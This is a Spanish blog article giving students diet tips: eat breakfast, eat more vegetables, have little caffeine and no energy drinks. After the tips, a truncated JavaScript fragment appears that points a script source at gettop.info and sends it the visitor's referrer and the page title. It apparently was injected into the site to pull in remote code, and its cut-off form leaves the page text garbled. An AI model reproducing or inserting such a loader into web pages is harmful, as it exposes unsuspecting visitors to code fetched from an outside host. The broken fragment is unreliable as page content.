Salud y belleza » Alimentación

La alimentación de un estudiante I

Sin Comentarios

Extraordinaria es la diferencia que existe entre un estudiante modelo y entre una estudiante de modelaje. Si nuestra tarea constara, de hecho, en efectuar una dieta pensando en una estudiante de modelaje, el plan alimenticio seguramente sería limitado (…e irrisorio, si tenemos en cuenta las paradigmas estéticos del mundo de la belleza).

Pero, en fin, tal cual se expresa en el título, el presente artículo nada tiene que ver con el cosmos de la moda o las pasarelas y sus esfuerzos por leer a Osho (o por usar otro libro pero, claro, para colocarlo sobre su cabeza y practicar equilibrio) sino, todo lo contrario, se trata sobre otro modelo: el estudiante modelo, es decir, el ejemplar, el paradigmático.

Bien, para entender por qué un sujeto que se ilustra debe nutrirse de un modo especial, debemos, antes, prestarle atención a cierta nomenclatura presente en los alimentos: ciertas sustancias ayudan a desarrollar la atención, otras la memoria e, inclusive, algunas espolean la concentración. Sí, la alimentación de un estudiante tiene su ciencia (justo el término).

“Los individuos que están sujetos a una rutina relacionada con el esfuerzo intelectual –que invariablemente también será uno del tipo físico- deben llevar una alimentación especial. A menudo, muchos estudiantes, ya sea por cuestiones de tiempo o similares, se saltean comidas o se alimentan con aquello que se encuentra más al alcance de su mano. Muchos piensan que, su concentración o fuerzas, sólo dependen del café o los energizantes. Esto es un terrible error. Un estudiante debe alimentarse con frutas, verduras, carnes, un poco de cafeína en momentos claves como la mañana, y nada, pero nada, de energizantes que puedan llegar a trastornar su sistema nervioso” confiesa un especialista.

Aquí, de acuerdo a esa corriente de pensamiento inaugurada por aquel profesional, y en convergencia con otros datos recolectados mediante la opinión también de otros sabios del campo de la alimentación, elaboramos una guía pensada para los estudiantes (¡otra guía más que se agrega a todas esas que le son propias de la carrera que escogieron!).

A leerla con atención: en esta entrega, la primera parte.

  • Un estudiante nunca debe saltearse el desayuno que, como se sabe, es la comida más importante del día. No sirven las excusas ni las historias sobre despertadores averiados: es necesario tomar una infusión a la mañana (café, té o algún zumo frutal) junto con algún carbohidrato (pan negro, tostadas, etc.) y algo de azúcar (mermelada, por ejemplo).
  • En época de exámenes (aunque bien podría aplicarse para todo el año) incorpore verduras a su dieta (si antes ya lo hacía, intente subir la cantidad) pues éstas, en su mayoría, contienen potasio, magnesio, ácido fólico y fibra. Así, no solo tendrá una rápida digestión, sino también se sentirá con más fuerzas para poder desarrollar largas jornadas de estudio.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.